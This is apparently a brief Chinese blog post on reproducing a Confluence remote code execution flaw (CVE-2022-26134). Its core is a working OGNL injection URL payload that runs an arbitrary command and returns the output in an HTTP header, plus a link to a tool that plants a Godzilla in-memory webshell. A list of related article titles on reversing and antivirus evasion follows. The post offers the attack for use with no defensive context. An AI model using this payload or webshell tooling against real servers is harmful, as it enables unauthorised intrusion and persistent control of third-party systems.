漏洞复现-confluence远程代码执行
2023-02-18 16:42:20 时间
/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("COMMAND").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}/
https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
使用此工具直接写入内存马
相关文章
- X86逆向7:特殊窗体的分析思路
- X86逆向8:向程序中插入新区段
- X86逆向9:通过关键常量逆向
- X86逆向10:学会使用硬件断点
- X86逆向11:F12暂停法的妙用
- X86逆向12:内存补丁的制作
- X86逆向13:向程序中插入Dll
- X86逆向14:常见的脱壳手法
- X86逆向15:OD脚本的编写技巧
- 思科交换机配置笔记
- 思科设备ACL与NAT技术
- DVWA漏洞演练平台 - 文件上传
- BurpSuite 爆破网页后台登陆
- 软件测试|charles抓包配置具体操作步骤
- Vue CLI 2 脚手架 TabBar 组件封装
- Web文件上传靶场 - 通关笔记
- XSS跨站攻击靶场-通关笔记
- Payload 实现分离免杀
- 动态加载 ShellCode绕过杀软
- Vuex 3.x 状态管理模式